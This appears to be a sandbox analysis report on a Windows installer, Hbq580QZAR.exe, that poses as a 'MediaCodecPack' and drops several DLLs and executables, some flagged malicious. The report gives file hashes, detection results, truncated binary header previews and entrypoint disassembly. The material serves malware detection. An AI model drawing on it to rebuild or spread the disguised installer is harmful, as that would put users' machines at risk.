                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):176128
                                                                                          Entropy (8bit):6.204917493416147
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                          MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                          SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                          SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                          SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):3306150
                                                                                          Entropy (8bit):6.383117784462356
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:GJMOsl+1vp+rdZ72dLFGhFLQFpWVIvk3O/:GGLc1vp+rdp2vGhFLmvkm
                                                                                          MD5:9D87A2B2BA8C6C1F180D537F1CB15C77
                                                                                          SHA1:153B53AAB3961F1A375539B16C92DC4A24711113
                                                                                          SHA-256:108138BC31E7805BC683723B54CF68C3BDF821BE3D36D9A191200ED04AF1E3EC
                                                                                          SHA-512:E440874A464A64BDDAAB6ABB28B07C579B515D3C6D49DBBD9A99BEACF32EA1407EADCC828159AA90D547FAFA1F6D0D93DCC42A5E1AE6B1B620C34D665615F2CD
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-K5SAB.tmp, Author: Joe Security
                                                                                          Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...F.bg.................j...D.......#............@...........................2.....B.3.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4.... ....... ..|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1645320
                                                                                          Entropy (8bit):6.787752063353702
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                          MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                          SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                          SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                          SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:MS Windows HtmlHelp Data
                                                                                          Category:dropped
                                                                                          Size (bytes):78183
                                                                                          Entropy (8bit):7.692742945771669
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                          MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                          SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                          SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                          SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                          Malicious:false
                                                                                          Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):176128
                                                                                          Entropy (8bit):6.204917493416147
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                          MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                          SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                          SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                          SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:modified
                                                                                          Size (bytes):3306150
                                                                                          Entropy (8bit):6.383118190067132
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:1JMOsl+1vp+rdZ72dLFGhFLQFpWVIvk3O/:1GLc1vp+rdp2vGhFLmvkm
                                                                                          MD5:ADAB835347D3F69415F7ED6C10C13B85
                                                                                          SHA1:540F6CCD18A0896D96FC711A0DD4C27F6C2E7403
                                                                                          SHA-256:3073D7435C4ECB43BA08C28D1238A05853379815C2F967575DEB6DF43937A1AC
                                                                                          SHA-512:067EFBF5E8A092C73F852A15A9E950D992D6018F08285481162310712F74169DE61BB14DC6A133681484CBAA6C6E7CDF0E54BA411737F3A901FB0BBFEA768F4C
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...F.bg.................j...D.......#............@...........................2.....B.3.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4.... ....... ..|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):499712
                                                                                          Entropy (8bit):6.414789978441117
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                          MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                          SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                          SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                          SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):348160
                                                                                          Entropy (8bit):6.542655141037356
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                          MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                          SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                          SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                          SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):717985
                                                                                          Entropy (8bit):6.51490177808013
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                                          MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                                          SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                                          SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
                                                                                          SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:InnoSetup Log MediaCodecPack, version 0x30, 4704 bytes, 571345\user, "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11"
                                                                                          Category:dropped
                                                                                          Size (bytes):4704
                                                                                          Entropy (8bit):4.735495052164898
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:U2jdWO38DpTlIHu39V+eOIh/ia7ICSss/LnzU2xn6oXJWyJgFAcP2:U2jdWO3opTl4HIh/NICSsAnzU2x6oXJj
                                                                                          MD5:DC55513B4A636F61F166FBAF93CA44E4
                                                                                          SHA1:ED8B86138CEF44FA453D057CB6743EEEBC0B9CE5
                                                                                          SHA-256:466128CB7E68F95F60133CC77BFA2DFD5E9248B096A66709A25364F223518C8A
                                                                                          SHA-512:4EDF57C52EC01D2748596D18F09EEFB9B574AA672EDC3E4F8C564F7C01FBE9BE47479BA928D4B2F258322F32F6FE80B9F79FFD225FB284624705FA25F9DE5225
                                                                                          Malicious:false
                                                                                          Preview:Inno Setup Uninstall Log (b)....................................MediaCodecPack..................................................................................................................MediaCodecPack..................................................................................................................0.......`...%................................................................................................................c.|.........'.U......T....571345.user3C:\Users\user\AppData\Local\MediaCodecPack 1.0.11...............G.. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:Us
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):717985
                                                                                          Entropy (8bit):6.51490177808013
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                                          MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                                          SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                                          SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
                                                                                          SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\Hbq580QZAR.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):706560
                                                                                          Entropy (8bit):6.506374420963084
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:NTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyF:FPcYn5c/rPx37/zHBA6pFptZ1CENqMRU
                                                                                          MD5:ED6A19AD054AD0172201AF725324781B
                                                                                          SHA1:817F409DBE431AE71D3AB4D70181257C3BEE4DBD
                                                                                          SHA-256:79DB034686A25A6BA5DEF19B0CDEDB7097A78F994FB4A1CD33765E0FD49C9423
                                                                                          SHA-512:D5D67F03F50D6EED159BB967735B9AE2ADDA579110D35A23A76BC2DF2B023122805C64E913A2A333B45EE8412F799BAC1538C8D4573DCDA7BB8147ACB6445729
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2560
                                                                                          Entropy (8bit):2.8818118453929262
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):6144
                                                                                          Entropy (8bit):4.289297026665552
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                          MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                          SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                          SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                          SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):23312
                                                                                          Entropy (8bit):4.596242908851566
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.997820737228061
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          File name:Hbq580QZAR.exe
                                                                                          File size:3'445'716 bytes
                                                                                          MD5:015bce2662bf644e819a99d3d2b0548b
                                                                                          SHA1:cb27cb5da28a774e5590324b6062fc5953c09033
                                                                                          SHA256:d9ff5271da8e7ad2da78a2da803f4c2faed7c13da15700ce27547dc7c6529644
                                                                                          SHA512:d54fa4b0a1264f51043b1c0fb1c49f92ea0a60ef332b469d177229f86f0181f84ca5d31993e1ce6f6fba76c41cb59150055961c3540cf290abfcf989b8a2c039
                                                                                          SSDEEP:98304:MDp9KSy1XmbFzLZifsaApwGoA/OdH+n1rELwX2:bSc2bpIfsaApw3A8S1Qi2
                                                                                          TLSH:0EF53312C2CACB34CC5DB675CDAF97209F727B6114A6924CF20B847F6F62DC256182DA
                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                          Icon Hash:2d2e3797b32b2b99
                                                                                          Entrypoint:0x40a5f8
                                                                                          Entrypoint Section:CODE
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:1
                                                                                          OS Version Minor:0
                                                                                          File Version Major:1
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:1
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                          Instruction
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          add esp, FFFFFFC4h
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          xor eax, eax
                                                                                          mov dword ptr [ebp-10h], eax
                                                                                          mov dword ptr [ebp-24h], eax
                                                                                          call 00007F5204B1CEA3h
                                                                                          call 00007F5204B1E0AAh
                                                                                          call 00007F5204B1E339h
                                                                                          call 00007F5204B1E3DCh
                                                                                          call 00007F5204B2037Bh
                                                                                          call 00007F5204B22CE6h
                                                                                          call 00007F5204B22E4Dh
                                                                                          xor eax, eax
                                                                                          push ebp
                                                                                          push 0040ACC9h
                                                                                          push dword ptr fs:[eax]
                                                                                          mov dword ptr fs:[eax], esp
                                                                                          xor edx, edx
                                                                                          push ebp
                                                                                          push 0040AC92h
                                                                                          push dword ptr fs:[edx]
                                                                                          mov dword ptr fs:[edx], esp
                                                                                          mov eax, dword ptr [0040C014h]
                                                                                          call 00007F5204B238FBh
                                                                                          call 00007F5204B234E6h
                                                                                          cmp byte ptr [0040B234h], 00000000h
                                                                                          je 00007F5204B243DEh
                                                                                          call 00007F5204B239F8h
                                                                                          xor eax, eax
                                                                                          call 00007F5204B1DB99h
                                                                                          lea edx, dword ptr [ebp-10h]
                                                                                          xor eax, eax
                                                                                          call 00007F5204B2098Bh
                                                                                          mov edx, dword ptr [ebp-10h]
                                                                                          mov eax, 0040CE28h
                                                                                          call 00007F5204B1CF3Ah
                                                                                          push 00000002h
                                                                                          push 00000000h
                                                                                          push 00000001h
                                                                                          mov ecx, dword ptr [0040CE28h]
                                                                                          mov dl, 01h
                                                                                          mov eax, 0040738Ch
                                                                                          call 00007F5204B2121Ah
                                                                                          mov dword ptr [0040CE2Ch], eax
                                                                                          xor edx, edx
                                                                                          push ebp
                                                                                          push 0040AC4Ah
                                                                                          push dword ptr fs:[edx]
                                                                                          mov dword ptr fs:[edx], esp
                                                                                          call 00007F5204B23956h
                                                                                          mov dword ptr [0040CE34h], eax
                                                                                          mov eax, dword ptr [0040CE34h]
                                                                                          cmp dword ptr [eax+0Ch], 00000000h
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
